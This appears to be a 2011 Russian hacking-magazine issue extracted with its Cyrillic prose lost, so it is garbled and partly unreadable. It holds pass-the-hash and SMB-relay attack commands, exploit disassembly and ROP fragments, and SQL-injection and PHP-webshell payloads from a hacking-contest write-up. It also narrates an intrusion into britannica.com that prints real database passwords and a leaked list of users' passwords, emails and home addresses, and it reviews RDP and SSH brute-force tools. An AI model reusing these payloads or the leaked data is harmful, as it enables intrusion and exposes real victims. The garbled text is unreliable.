$[0-9] $[0-9] $[0-9]

. : {0,1,2,3,4,5,6,7,8,9}.
.
pentest.wordlist
Adm
:
X 03 /146/ 2011

john-386.exe wordlist=pentest.wordlist
rules stdout > pentest.passes
. :
hydra l <_> -P passwords.
txt -m L 192.168.120.11 smbnt
L,
,
. ,
. , , .
.

. . , ,
,
.
? , ...
-? ,
.
, ,
,
.
: , ? .

.
Cached Domain Credentials.
, , LM NTLM .
, .
CachedLogonsCount
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows NT\Current Version\Winlogon.

. ,
.
, Cain PWDumpX.
,
.
HTTP://WWW
links

LM-

:
en.wikipedia.org/wiki/
LM_hash;

Windows: support.microsoft.com/
kb/913485;
pokehashball: grutz.jingojango.net/exploits/
pokehashball.html;
,
,

pass-the-hash: darknet.org.uk/2010/10/
windows-credentialseditor-v1-0-list-addedit-logon-sessions;

Microsoft
SMB Relay:
microsoft.com/technet/security/bulletin/
ms08-068.mspx;
SMB signing:
support.microsoft.
com/kb/887429;
SmbRelay3

: htarasco.
org/security/smbrelay.
045
Cain, Cracker
MS-Cache Hashes. , .
,
.
, , , ,
. , ,
. ,
, , ,
.
Extreme GPU Bruteforcer,
, , , .
-, .
! lamercomp pokehashball.

, .
. <Send>
.
pokehashball.
.
NTLM- LM-.
. (, ,
). NTLMv2-, , , .

. , .
: , 100% .
. , ,
:
, ,
!
, , ,
.
, ,
.
, , HTML Outlook IE.
IE .
, , . ,
, , . IE (
, Outlook) web-.
.
, ,
. web-,
.
pokehashball.
Ruby Metasploit.
, , Metasploit
RUBYLIB=C:\
framework\msf3\lib.
Outlook Express. ,
Outlook ; .
Outlook Express , , . ?
HTML- :
Hacker,<br />m0r0 Corporation <img width=1 height=1
src="http://lamercomp:8088/d.gif" />
Outlook ,
,
.
046
, , .
.
, .
Single Sign-On. ,
, .
, Microsoft.
, ,
CRM . ,
, .
, ,
, LM NTLM. :
, ,
,
.
pass-the-hash. ,
. .
, .
, , ,
, . wce,
,
.
X 03 /146/ 2011
.
, .
,
.
.
,
:
wce.exe r60 o c:\temp\wce.log
r60
60 .

LSASS. LocalSystem.
psexec
s. .
,
. .
,
, .
,
, .
, Microsoft
. , , . ,
, ,
wce, . ,
, .
, ,
LocalSystem (
), .
. , .
.
:
wce.bat
@echo off
c:\temp\wce.exe -o c:\wce.log
.
.
HKEY_
LOCAL_MACHINE\Software\Microsoft\Windows\Current
Version\Run.
, . ,
X 03 /146/ 2011

, , ,
. ,
c:\wce.log.
INFO
wce s <, > -c cmd
, , ,
.
, , ,
LM- NTLM-,
. , ,
challenge,
.
SMB Relay.
Microsoft .
(, NT) - MS08-068. , .

.
SMB.
,
EnableSecuritySignature RequireSecuritySignature
HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services\LanManServer\
Parameters. ,
Windows 2000 RequireSecuritySignature
,
.
.

smb_relay Metasploit.
, ,
smb_relay:
info

,
,
.
.

.
DVD
dvd

,

,

.
use windows/smb/smb_relay
set smbhost <ip- >
exploit
047

? . , , 445 SMB. , , . regedit TransportBindName HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
. .
! -
,
, meterpreter , . , ?
, ?
. : . meterpreter .
Help, I need somebody
. ,
. , ?
, . -
. ,
Metasploit , 445
, , .

, - .
,
, HTTP. web-

. SMB, , .
. , - . , Metasploit smb_relay
, SMB.

048
smbrelay3. , .
, :
smbrelay3.exe --ListForHTTPRequests
--AlternativeSrcPort 8088 --SMBDestinationHost
<lamercomp>
[+] *** Remote SmbRelay3 BindShell Service Running

***: (< IP>:8080),
8080.
net user .
,
, 9 10 :
!. ,
.
, , ,
.
, .
pass-the-hash
, . , .
, Microsoft ,
, .
: ,

. ,
][. z
X 03 /146/ 2011

, CISS Research Team, twitter.com/NTarakanov
Microsoft
: Windows (EnableEUDC),
,
, ,
.
, :
21- PoC, FTP-, IIS 7.5;
22- wooyun.org ActiveX' WMI Administrative
Tools;
27- , rgod, PoC Fax
Cover Page Editor;
4- metasploit
, POC2010;
5- Google Internet Explorer'e.
Security Research &
Defense, , Workaround
(CVE-2010-3970) ACL-
shimgvw.dll.
Microsoft ,
DoS only,
.
FTP(CVE-2010-3972): MS , ,
(0xFF ),
!
,
EIP.

, .
(Insecure Library Loading Backup Managere'e)
, Vista.
MDAC,

Pwn2Own. .
050
01

MICROSOFT DATA ACCESS
COMPONENTS
TARGETS: Windows XP, 2003, Vista, 2008, 7

BRIEF
Integer Overflow, , ,
heap'a CacheSize
ActiveX MSADO.
CacheSize RecordSet
,
. CacheSize
, ,
4, DWORD 4 :
msado.dll
.text:4DDFC348 lea
eax, ds:4[eax*4]
; eax CacheSize
.text:4DDFC34F push
eax
.text:4DDFC350 push
0A00000h
.text:4DDFC355 push
?g_hHeapHandle@@3PAXA
; void * g_hHeapHandle
.text:4DDFC35B call
ds:__imp__MpHeapAlloc
;
, ,
CacheSize 0x40000000, ,
, .
. -,
? XML Data
Island, , XML, html-, :
X 03 /146/ 2011
0x21212121 EIP :)

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<HereIsCouldBeAnyData />
</Device>
</Devices>
</XML>
-, , -
? RecordSet:
MoveFirst, MoveNext . ,
, .

ASLR.
:
: ;
, heap'e,
2 0x00 ;
C++, DWORD -
.

, JavaScript
, 0x0000.
0x0000, 0x00010001. :
-
. ,
, :
X 03 /146/ 2011
function IncreaseRowCounter()
{
if(GlobalRowCounter < 0x10120)
{
for(i = 0; i < 0x300; i++)
{
GlobalRowCounter++;
localxmlid2.AddNew(["BBBB"], ["c"]);
localxmlid2.Delete();
}
var percentcomplete = Math.round(
GlobalRowCounter /0x10120 * 100);
document.getElementById(
'progressfaseone').innerText =
percentcomplete + "%";
window.setTimeout(IncreaseRowCounter, 100);
}
}
, :
(
ASLR), DEP ROP-. Mso.dll
VirtualProtect,
, - Executable.
use-after-free (CVE-2010-1262)
ms10-035. , !
,
.
SOLUTION
ms11-002: microsoft.com/technet/security/Bulletin/MS11002.mspx
051
- ATL- VirtualProtect
4,
02

MICROSOFT GRAPHICS RENDERING
ENGINE
TARGETS: Windows XP, 2003, Vista
.text:5D020200
.text:5D020201
push
call
eax
; int
_CreateSizedDIBSECTION@28
CreateSizedDIBSECTION biClrUsed
(signed). :
.text:5D01FC2D loc_5D01FC2D:
BRIEF
Windows
. POC2010 &
,
! ,Explorer -, : ,
,
( , doc- pdf-)
, .

ConvertDIBSECTIONToThumbnail shimgvw.
dll, , ,
CreateSizedDIBSECTION.
.text:5D0201F5
.text:5D0201F6
.text:5D0201F7
.text:5D0201FA
.text:5D0201FB
.text:5D0201FC
.text:5D0201FD
052
push
push
push
push
push
push
lea
edx
; int
ecx
; int
[ebp+arg_8] ; int
esi
; int
ecx
; HPALETTE
eax
; int
eax, [ebp+var_10]
.text:5D01FC2D cmp
ecx, 100h
; ecx biClrUsed
.text:5D01FC33 jg
loc_5D01FCF0
; !!!
.text:5D01FC39 lea
esi, [edx+28h]
.text:5D01FC3C lea
edi, [ebp+var_430.bmiColors]
.text:5D01FC42 rep movsd ; inline memcpy
, ecx ,
, , . ,
WebDav Internet Explorer.
: ,
.
Explorer.exe, Windows XP,
Explorer.exe DEP permanent. -
ROP- DEP,
SetProcessDEPPolicy VirtualAlloc c RWX .
X 03 /146/ 2011
metasploit'a:
#
'imp_VirtualAlloc',
'call [ecx] / pop ebp / ret 0x10',
0,
0x1000,
#
0x3000,
#
0x40,
# RWX
SOLUTION
MS, Fixit-. DLL

: echo y| cacls %WINDIR%\SYSTEM32\shimgvw.dll /E
.text:0002B850
.text:0002B850
.text:0002B851
.text:0002B852
.text:0002B856
.text:0002B859
.text:0002B85C
.text:0002B85F
.text:0002B862
.text:0002B866
.text:0002B86D
.text:0002B870
.text:0002B873
.text:0002B879
.text:0002B87C
.text:0002B885
/P everyone:N
03

AGNITUM OUTPOST SECURITY
SUITE PRO
TARGETS:
Agnitum Outpost Security Suite Pro Agnitum, VBEngNT.sys

BRIEF
: HIPS-
, .
DLL . Handle
\\.\vbengnt Guest
ioctl-
,
. , ioctl-
, -
.
, dll 50 - 50.

,
. .
Ioctl \\.\vbengnt
.text:0002B850 ioctl_handler
X 03 /146/ 2011
proc
Irp = dword ptr 8

push
esi
push
edi
mov
edi, [esp+8+Irp]
mov
eax, [edi+60h]
mov
ecx, [eax+4]
mov
esi, [eax+8]
mov
edx, [edi+0Ch]
mov
[esp+8+Irp], ecx
mov
dword ptr [edi+1Ch], 0
movzx ecx, byte ptr [eax]
sub
ecx, 0
jz
loc_2B97D
sub
ecx, 2
jz
loc_2B967
jz
short loc_2B8A0
; ecx == 0x0E (IOCTL)
Ioctl- :
.text:0002B8A0 loc_2B8A0:
.text:0002B8A0
mov
eax, [eax+0Ch]
.text:0002B8A3
mov
ecx, eax
; eax IoCtl
.text:0002B8A5
shr
ecx, 2
and
ecx, 0F00h
.text:0002B8A8
cmp
ecx, 800h
.text:0002B8AE
.text:0002B8B4
jz
short loc_2B8CD
[..]
.text:0002B8CD loc_2B8CD:
.text:0002B8CD
lea
.text:0002B8D1
push
.text:0002B8D2
push
.text:0002B8D3
push
.text:0002B8D4
push
.text:0002B8D5
call
ecx, [esp+8+Irp]
ecx
esi
edx
eax
vuln_function
0x0001DAA0 :
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0
.text:0001DAA0
vuln_function proc near

arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
053
.text:0001DAA0
.text:0001DAA0
.text:0001DAA4
.text:0001DAA7
.text:0001DAA8
.text:0001DAAC
.text:0001DAAE
.text:0001DAB3
.text:0001DAB6
.text:0001DABC
.text:0001DC03
mov
shr
push
mov
mov
and
cmp
mov
jb
eax, [esp+arg_0]
eax, 2
edi
edi, [esp+4+arg_C]
ecx, [edi]
eax, 0FFh
eax, 32h
dword ptr [edi], 0
short loc_1DAC7
call
ENGINE_XmlMsgEmpty
[..]
.text:0001D200 ENGINE_XmlMsgEmpty proc near
.text:0001D200 arg_0 = dword ptr 4
.text:0001D200
.text:0001D200 push
esi
.text:0001D201 mov
esi, [esp+4+arg_0]
.text:0001D205 test
esi, esi
.text:0001D207 jnz
short loc_1D212
[..]
[..]
.text:0001DAC7 loc_1DAC7:
.text:0001DAC7 mov
edx, [esp+4+arg_8]
.text:0001DACB cmp
edx, dword_45418[eax*4]
;
.text:0001DAD2 jz
short loc_1DADD
.text:0001D218
add
esi, 14h
; esi
.text:0001D21B
.text:0001D21C
push
call
esi
sub_37650
[..]
.text:0001DAEB loc_1DAEB:
.text:0001DAEB cmp
eax, 31h
; switch 50 cases
.text:0001DAEE push
esi
.text:0001DAEF ja
loc_1E186
; default
.text:0001DAEF
; jumptable 0001DAF5 case 3
.text:0001DAF5 jmp
ds:off_1E190[eax*4]
;
, ENGINE_XmlMsgEmpty
:
.text:0001DBFC
.text:0001DC00
; esi
.text:0001DC02
.text:00037650 sub_37650
proc near
.text:00037650 arg_0 = dword ptr 4
.text:00037650
.text:00037650 mov
eax, [esp+arg_0]
.text:00037654 mov
dword ptr [eax+14h], 0
; 0x00000000
.text:0003765B mov
dword ptr [eax+20h], 1
.text:00037662 add
eax, 28h
.text:00037665 mov
[esp+arg_0], eax
.text:00037669 jmp
nullsub_1
.text:00037669 sub_37650
endp
mov
mov
esi, [esp+8+arg_4]
eax, [esi]
SOLUTION
push
eax

HIPS. z
Handle!
054
54
X 03 /146/ 2011

M4g icq 884888, snipper.ru

,
17681771 . 1995 ,
.

,
.

, ab
ovo, ,
britannica.com ( eb.com). ,
, Blog
britannica.com/blogs. ,
,
:
<meta name="generator" content="WordPress 2.2" />
, ,
:
056
, , .
, , : inurl:britannica.
com filetype:php.
, .
,
.
,
:
britannica.com/blogs/?author=[N] ([N] ID
X 03 /146/ 2011
INFO
info
WordPress

) .
ID, ,
:
admin, mlevy, dhoiberg,
jluebering, jhennelly,
whosch, kkuiper, tpappas,
rmchenry, gmcnamee, rhorrow,
tom, bcosgrave, tgallagher,
rmurraythomas, jennifer,
ksparks, aguttmann,
jmaguire, rwilson
,
:).
X-Tools WBF.Gold (wonted.ru/programms/
wbf-gold).
:
/ : http://www.
britannica.com/blogs/wp-login.php
: POST
Submit-: Name=wp-submit,
Value=Login
:
""=log, ""=pwd
: input type="password"

insidepro.com/rus/download.shtml

. - ,
mlevy
London :).
, .
, britannica.com/blogs/wp-admin , mlevy X 03 /146/ 2011
,
Plugins.
,
akismet/akismet.php -.
.
(britannica.com/
blogs/?britan)
- (/apps/docs):
account-443
account-80
benandbella
bindia
blog.qa.tar.bz2
catalog
category-template.php
contributor
corporate-80
dead.letter
deprecated_site_pages-80
dev-blog-wp22.zip
failover
form01-80
forms01-80
gcoop-80
help-80
httpd-advocacy
httpd-safe-443
https-199
....
wordpress-blog-80
wppingback-80
www-80

:
1.

.
2.

.
3.

(apache
)

.
4.
,

.
HTTP://WWW
links

: britannica.
com/blogs;

: britan nicaindia.com;
(-
- WSO:
, , ,
https://rdot.org/
):
forum/showthread.
php?t=1085.
/apps/docs/wordpress-blog-80/blogs/
wp-config.php:
define('DB_NAME', 'blogs'); // The name of
the database
define('DB_USER', 'wordpress'); // Your
057

MySQL username
define('DB_PASSWORD', 'gutenberg5!'); // ...and
password
define('DB_HOST', 'blogs.db'); // 99% chance you
won't need to change this value
/apps/docs/bindia/codelibrary/inc/connection.php:
$dbConn = pg_pconnect("host=bi.db port=5432 dbname=bi
user=bi password=bi");
e-mail',
( ,
: ),
WSO -, PostgreSQL.
bi.db,
: postgres, ihop, bi, aasl, site,
ebtimeline, bil.
tbl_order_master, :
order_id
order_number
order_date
uid
order_status
bill_name
bill_address
bill_phone
bill_email
ship_name
ship_address
shipp_phone
shipping_chrages
058
:
: 55-56, Udyog Vihar, Gurgaion Phase IV,
Gurgaon, Gurgaon, India
: 9810040499
E-mail: kaushik@britannicain.com
A : 55-56, Udyog Vihar, Gurgaion Phase IV
britannicain.com (, , )
, bi Britannica India. ,
, ,
britannicaindia.com /apps/
docs/bindia .
britannicaindia.com
Encyclopaedia
Britannica ( CD/DVD),
.
, ,
,
ReverseIP- yougetsignal.
com/tools/web-sites-on-web-server:
advocacy.britannica.com
benandbella.eb.com
britannicaindia.com
corporate.britannica.com
corporate.eb.com
forms01.britannica.com
help.eb.com
info.eb.com
newsletter.eb.com
newsletters.britannica.com
partners.britannica.com
sales.britannica.com
statistics.eb.com
store.britannicaindia.com
X 03 /146/ 2011

support.britannica.com
universal.eb.com
www.apps.eb.com
www.britannicaindia.com
, - .
, :).
tbl_register, 9 470 . : ,
-
( ,
).
:
Honie:rose:harpritkaur@hotmail.com:D-6/13, Vasant
Vihar
ritesh:rockrover:riteshroxy@yahoo.com:sun power flats
g block s.f.-4 memnagar
pioneer:pravyogi:pravin_hande@rediffmail.com:bhau
daji road
ganguly:goa@calcutta:ganguly_sumam@yahoo.com:24, ali
chirag lane,
muthana:pretty:muthana@vsnl.com:12 Sarat Chatterjee
Avenue
anurup:mitali:anurup_m@vsnl.com:Surasree 24A, Lake
View Road
superbat393:scurvycur:superbat_393@yhaoo.
co.uk:12,T.S.Krishna nagar extn,mogappair
SuyashAnand:999999999:suyashanand@yahoo.com:xyz
champakali:mypczenith:bbsr@lnsel.com:cuttack
sim00:7020557:sim00@rediffmail.com:125 sainik vihar
arka:arkaarka:kaaraak@yahoo.com:catia
anilpost:bathinda:anilpost@hotmail.com:2242, urban
estate phase-ii
k_dasgupta:mampu:k_dasgupta@hotmail.com:PO Box 72
madhu:rama:ureply@rediffmail.com:6576
satyajitpani:silusilu:satyajit_pani@msn.com:cuttack
chandi cuttack
ramkishore:bansal123:ramkishore@vsnl.com:235, Katra
Peran, Tilak Bazar
rjana:1234:rjana@vsnl.net:haldia
rakov2000:rakov2000:xaldinx@gmail.com:&3/2, Krishna
Nagar
padma:suhana:padma@ebindia.com:B-2/171, Sfdarjang
Enclave
manish:purohit:manish@manishpurohit.com:d-77
X 03 /146/ 2011

Panchsheel Enclave
thomas:thomas:thomas@britannicain.com:l-86 madangir
RajuV:plsGOD:vraju3@emirates.net.ae:AYDJA PO BOX 25
vikram:krishnaaa:vikram@britannicain.com:c-266,sarita
vihar

SELECT username||chr(58)||password||chr(58)||email||c
hr(58)||address FROM tbl_register LIMIT 30 OFFSET 0.
britannicaindia.
com/registration.php
vinay_75a;13041974, , , .
,

:). ,
.
PostgreSQL
.
, bil users
:
gabie;springsprung
tea;tea
mwiechec;password
sabis123!;sabisimages
erc123!;ercimages
kossuth;kossuth123!

, , - ReverseIP-.

,
, ,
.

-,
. ,
, -...
:). z
059

, Digital Security (twitter.com/asintsov)

, .
, ,
. , 0day-...

, , , . ,
.
. ,
. ,
, .
: DLL-Hijacking, ARP-POISONING, SMB
RELAY... ,
libc, LD_AUDIT (
). , .
.
060
. -
. .
. ,
.
, . ,
: ? ,
.
, , . ,
, .
X 03 /146/ 2011
CONFidene 2010(2):
, ,
: .
? ? ,
, ! ,
! ,
. - .
- . ,
/
. .
, , .
90%
. , ,
-
.
, ,
. ,
, ,
, , .
,
( , , ). ,
,
.
.
, , . NTLM,
.
,
, . ,
, ,
.
,
?
,
,
. ,
, ,
, ,
.
, , ,
. ,
, . X 03 /146/ 2011
, , ,
. , .
: , ,
, ,
<>, , . : , , ,
,
.
, (
). , :
:
select logins, FIO from db;
, , :
select * from db;
. , , .
...
061

, db
, ,
.
, ,
? ...
OpenEdge
, , .
RDBMS Progress OpenEdge. ?
, :
PepsiCo
Coca-Cola
Johnson & Johnson
Lockheed Martin
McDonnell-Douglas
Sony
Danon
Mercedes-Benz
Ford Motor
Mazda Motor Corporation
Heineken
...
, , ,
:). . ,
sh2kerr ( Yandex)
. :
062
,
. sh2kerr ,
. ... ! . , , ,
, - .
,
. . : ?
, ?. ,
. ? ,
, . OpenEdge,
, .
.
, , , , .
. _Users, ,
Admin, ,
TCP- .
. ... ?
? OllyDbg.
What the heck?
, .
OllyDbg ImmunityDebugger
OpenEdge prowin32.exe. , . recv(), , ,
. ,
WS2_32.dll, X 03 /146/ 2011

. :
-, Search for -> Name in all modules.

recv , recv WSOCK32.dll.
. <F9> (Run)
. recv.
, , (
prow32.dll) .
recv prow32.dll,
<F8>, , , recv (ESP+4 , ). <F8> <F9>,
. ,
:
(. ). <F9> ,
memmove, ,
,
.
, , :
CMP
. , - .
DLL' :).
. ,
, :
AL,BYTE PTR DS:[EDX]
AL EDX, ( , ,
). , , ECX EDX
, .
prow32.dll dbut_stcomp().
,
. , 0.
, . ,
EAX dbut_stcomp.
, EAX , RETN EAX , ,
.
TEST
JE
MOV
MOV
PUSH
PUSH
CALL
: , , ? ?
?
: , . - ?
: ? , !
: ... ,
XXX! , ?
: ! !
! , -!
: , !
AL,BYTE PTR DS:[ECX]
ECX , AL ,
. , :
MOV
, ,
EAX JE JNE.
, , , :
prow32.1024653F. <F9> : ,
.
.
, , ,
...
, :
EAX,EAX
SHORT prow32.1024653F
ECX,DWORD PTR DS:[106D1FF4]
EDX,DWORD PTR DS:[ECX+B0]
EDX
2C6
prow32.10026CA0 ;
, <F9>
.
X 03 /146/ 2011
: , , ? ?
?
: , . - ?
: ? 043 , 043!
: ... , ,
043...
: ! !
043 ...
: 043, ...!
, .
: , , ,
-. . n- .
:
. .
Kaspersky AV 1000day
, ,
.
.

, ,
. ,
aka GreenDog ( ...)
063

, ,
: ,
? Cain.
Oracle TNS (, , ),
Passwords -> SMB
, ,
X NTLM-
, - . Kasper.
,
( , SMB,
SMB2, Cain ).
?
, Google . , ,
.
,
. - ,
, ,
. , ,
. Kaspersky Administration
Kit 6/8 IP-. ,
ICMP-.
SMB,
, , . ,
NTLM-. ,
, ,
.
smb_relay- Metasploit,
Y .
Y NT AUTHORITY/SYSTEM.
, ?
064
1. Microsoft Active Directory.

2. Administration Kit.
3. Administration Kit IP-.
!
X 03 /146/ 2011
Windows-
.
,
,
. ,
, BackTrack,
smb_relay.
NTLM-
( X, ).
, Y
. Y NTLM-Response , X. X ,
.
smb_relay Y ,
, Y
, . , , , meterpreter. Y (
, , , ).
Windows,
(
).
NTLM .
. IP- +
(NTLM) .
,

. . ,
,
.
- ,
, .
, , +
, , .
may the force be with you... z
X 03 /146/ 2011

, Positive Technologies (devteev.blogspot.com)
, Positive Technologies (ptresearch.blogspot.com)
oxdef , (blog.oxdef.info)
HackQuest 2010

-,
Chaos Constructions 2010,
online SecurityLab.
HackQuest 2010 ,
, : webhacking, social engineering, reverse engineering .
-
. ()
() ,
:). ,
, HackQuest 2010 .

.
1:
.
,
MySQL
SQL (insert-based).
, mod_security
. SQL- :
066
$query = "INSERT INTO indexes (text,source) value

('".$_GET['text']."',".$_GET['action'].")";
,
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2b(s
elect+1+from(select+count(*),concat((select+user()+fr
om+information_schema.tables+limit+0,1),0x3a,floor(ra
nd(0)*2))x+from+information_schema.tables+group+by+x)
a)*/,0)--+
, -
. ?
1. /*!...sql-...*/, SQL-
mod_security, (. devteev.
blogspot.com/2009/10/sql-injection-waf.html).
2. + (%2b) ( . https://rdot.org/forum/showthread.php?t=60).
3.
(. qwazar.ru/?p=7):
X 03 /146/ 2011
SQL Injection
, SQL Injection
Local File Including
Remote File
Including
old-school
+limit+0,1),0x3a,floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)*/,0)--+
...
admins.
Path Traversal
select 1 from(select count(*),concat((select
user()),0x3a,floor(rand(0)*2))x from information_
schema.tables group by x)a
4. SQL
,0),
. -,
+ ( HTTP GET- ).
,
. MySQL 5.x ,
information_schema,
. ,
SQL Injection
:
http://172.16.0.2/search.php?action=0&text=1'/*!%2
b(select+1+from(select+count(*),concat((select+tab
le_name+from+information_schema.tables+where+table_
schema!='information_schema'+and+table_schema!='mysql'
X 03 /146/ 2011
http://172.16.0.2/search.php?action=0&text=1'/*!%2b
(select+1+from(select+count(*),concat((select+colu
mn_name+from+information_schema.columns+where+table_n
ame='admins'+limit+1,1),0x3a,floor(rand(0)*2))
x+from+information_schema.columns+group+by+x)a)*/,0)-+
http://172.16.0.2/search.php?action=0&text=1'/*!%2b
(select+1+from(select+count(*),concat((select+colu
mn_name+from+information_schema.columns+where+table_n
ame='admins'+limit+2,1),0x3a,floor(rand(0)*2))
x+from+information_schema.columns+group+by+x)a)*/,0)-+
login password admins.

http://172.16.0.2/search.php?action=0&text=1'/*!%2b(s
elect+1+from(select+count(*),concat((select+concat_ws
(0x3a,login,password)+from+admins+limit+0,1),0x3a,flo
or(rand(0)*2))x+from+admins+group+by+x)a)*/,0)--+
admins ( MD5- ).
MD5- .
MD5- (,
xmd5.org).
,
- :).
robots.txt,
-.
,
Remote File Including (RFI).
-
067
LFI over /var/mail
XSS
pdf- flash-
hr(109)||chr(115)||chr(117)||chr(115)||chr(101)||chr(
114)||chr(115)+limit+1+offset+1)::text::int--
SuEXEC
-
. ,
PHP. ,
: <?php passthru($_
REQUEST['c']);?>.

RSA- , , RSA-,
SSH
.
SQLi->RFI->RSA .
2:
, , -,
SMS-.
SQL (selection-based)
PostgreSQL:
http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=cast(version()+as+numeric)

. , , -,
, -, . information_schema MySQL
5.x, :
http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=1;select(select+table_name+from+information_
schema.tables+limit+1+offset+0)::text::int-http://172.16.0.4/index.php?r=recovery&name=1&email=1
&status=1;select(select+table_name+from+information_
schema.tables+limit+1+offset+105)::text::int--
vsmsusers.
http://172.16.0.4/index.php?r=recovery&name=1&email=1&
status=1;select+(select+column_name+from+information_
schema.columns+where+table_name=chr(118)||chr(115)||c
068
login password vsmsusers.

,
, ,
(,

).
, ,
File Including (
Local File Including/LFI).
, , ,
, include().
PHP - (. raz0r.name/
releases/mega-reliz-samyj-korotkij-shell):
http://172.16.0.4/index.php?u=LV89284&p=data:,<?=@`$c
`?>&c=ls
?
1. stream wrappers (data PHP
5.2.0);
2. short_open_tag register_globals ON;

3. <?= ?> <? echo ?>;
4.
shell_exec().

, (/
etc/passwd). , telnet (, THC-Hydra, Medusa,
ncrack),
.
, ,
. telnet
.
3:
-
-,
.
-,
- (path
X 03 /146/ 2011
-
pdf
traversal).

(
online- securitylab.ru/hq2010/list.php).
- : GET /../../../root/.history HTTP/1.1.
, .
4:
-, .
(
index.bak)
, :

, IP-
( blacklist.php). ,
-
HTTP_X_FORWARDED_FOR, ,
, IP-
X-Forwarded-For (
CuteNews).

X-Forwarded-For - : ';?><?eval($_
GET['cmd']);?><?$a='.
, , , .
5: Cross-Site Scripting
XSS (,
, :)), XSS, DOM-based XSS (. owasp.
org/index.php/DOM_Based_XSS).
2005 , (. webappsec.org/projects/articles/071105.
shtml). , XSS ,
-
DOM -
JavaScript-. HTTP-
! :
...
Select your language:
<select><script>
document.write("<OPTION value=1>"+document.
location.href.substring(document.location.href.
indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script></select>
JavaScript-
default :
X 03 /146/ 2011
,
http://www.some.site/page.html#default=<script>alert(
document.cookie)</script>
, -
JavaScript- url- ,

. , , ,
. -
( ) Cross-Site Scripting .
. .
HTML- .
:
...
</div>
<script>
document.write(unescape('%3Cimg%20src%3D%22/img/stat.
png?site='+document.location.href+'%22%3E'));
</script>
</div>
</body>
</html>

, , , .
:
1. .
2. ,
JavaScript- (,
).
3. , .
4. , .
5. Profit!
069

RAZ0R HTTP://RAZ0R.NAME
1.
vasya.cc10.site:
echo Options +FollowSymLinks > /usr/local/www/data/
vasya/.htaccess
2. , : ln -s /usr/local/www/data/root/.htaccess /
usr/local/www/data/vasya/test.txt
3. ,
r00t.cc10.site: ln -s /usr/local/
www/data/root/.htpasswd_new /usr/local/www/data/
vasya/passwd.txt
4. MD5- (, PasswordsPro John the Ripper)

5. r00t.cc10.site
HTML-
6:
,
, -
Apache 80- ,
SMTP- DNS-. ,
-, DNS-.
? DNS-, .
DNS-, -: dig
@172.16.0.10 PTR 10.0.16.172.in-addr.arpa
DNS-: dig @172.16.0.10 cc10.site axfr
DNS (
hosts).
Local File Including
.
SMTP-
(. xakep.ru/post/49508/default.asp). , :
telnet 172.16.0.10 25
ehlo cc10.site
mail from:any@cc10.site
rcpt to:vasya
data
<?php passthru($_GET['cmd']);?>
.
ENTER
SMTP-,
:
http://vasya.cc10.site/index.php?file=/var/mail/
vasya%00&cmd=ls -la /
, .
SuEXEC, .

(. kernelpanik.org/docs/kernelpanik/
suexec.en.pdf). ,
-
AllowOverride All.
:
070
7: PDF
- () pdf-, -
. , pdf-
flash-.
, , , swf pdf-
zlib. swf- , , zlib Python.
- swf-.
swfdump
swftools. Obfuscate
.
, ,
:
00016)
00017)
00018)
00019)
00020)
00021)
00022)
00023)
00024)
00025)
00026)
+
+
+
+
+
+
+
+
+
+
+
0:0 getlocal_0
1:0 pushint 170
2:0 pushint 42
3:0 pushint 52
4:0 pushint 120
5:0 pushint 178
6:0 pushint 249
7:0 pushint 255
8:0 pushint 228
9:0 pushint 80
10:0 pushint 32
,
-.
, SQL.
8:

.
,
, .

- (, , , 3D-)
,

. , , -.
HTML-!
X 03 /146/ 2011
TFTP-
, -
,
HTML-. .
.
. HTML- (
, %username%, ),
.
,
HTML- ,
, .
, .
,
, 0, , ,
1. , .

ASCII-. + .
, -
, HTML- ,
.
,
, TFTP-.
, , -
.
TFTP- (69/
udp), , .
. ,
router-config,
Cisco IOS. ,

(, tftptheft)
router-config.
- , .
secret 7 (, Cain&Abel).
9: Cisco
, ,
Cisco
IOS. TCP- ,
FINGER. ,

.
TELNET cisco ( Cisco). . ,
:).
cisco .
X 03 /146/ 2011
,
. Router#show
running-config view full
, .
10: TFTP
,
( ),
HQ2010.
xakepru.habrahabr.ru/.
, HQ2010!
HQ2010, . ,
, ,
aka D0znp, .
( , ESET SecurityLab),
. -! z
071

icq 884888, http://snipper.ru
X-TOOLS
: Fast RDP Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ROleg
:
(MedWebGrasp, MWG)
: iHornet
SQL-,
,
.
, , ,
- :
;
MySQL;

.
SQL !

- ! ,
, RDP
Fast RDP Brute! Qtss-,
RDP 5.
:
RDP 5;

( 30 120);
( 120
);
;
.

IP-. :
1.
nmap ( :
insecure.org).
2. :\Program Files\Nmap\scripts
rdp.nse (
).
3. .bat :
@echo off
for /l %%%x in (1,1,100) do (
start "rdp" /HIGH nmap -n -Pn -p
T:3389 -T5 --script rdp.nse -iR 0
)
exit
4. , , ,
:)

: frdpb.hut2.ru.
072

SQLinjection
(
all inclusive
).
:
( );

( );
( );

( );
, ( );
, ( );
( );

( );
( );
( );
( );
( ).
,

MS Access 2003! , -
, , :
1. SQL
:
http://mysite.com/show.php?id=3+uni
on+select+1,2,user(),4,5--
2. .
3. ,
.
4. (
).
5.
SQL BSQL (
),

.
6. .
7. ,
.
8.
( ) , .
9.
(
, ,

,
*****[O1] ).
10. *pass*,*pwd*,*psw*, , .
11. , ,
,
* (
).
12.
* X 03 /146/ 2011
* .
.
13.
.
14. , ,
, ,

.

,

(load_file)
magic_quotes.

.

:
/tmp/;

phpinfo() ;

*nix-;
;
.
.
(
) .

ReadMe
.

,
mwg.far.ru mwgrasp.oni.cc (,

).
: SSH Bruteforce
: Kaimi
SSH
X 03 /146/ 2011
SSH SSH
Bruteforce Kaimi!
:
,

:).
;
(
, ,
;);
IP
;
-
;
brute_good.txt;
IP ( IP
,

).
:
eval() $$var_name,

UTF-8.

kaimi.ru/2010/10/php-obfuscator-1-5.
: Rings Skyper
: Sin3v

: kaimi.
ru/2010/12/ssh-bruteforce.
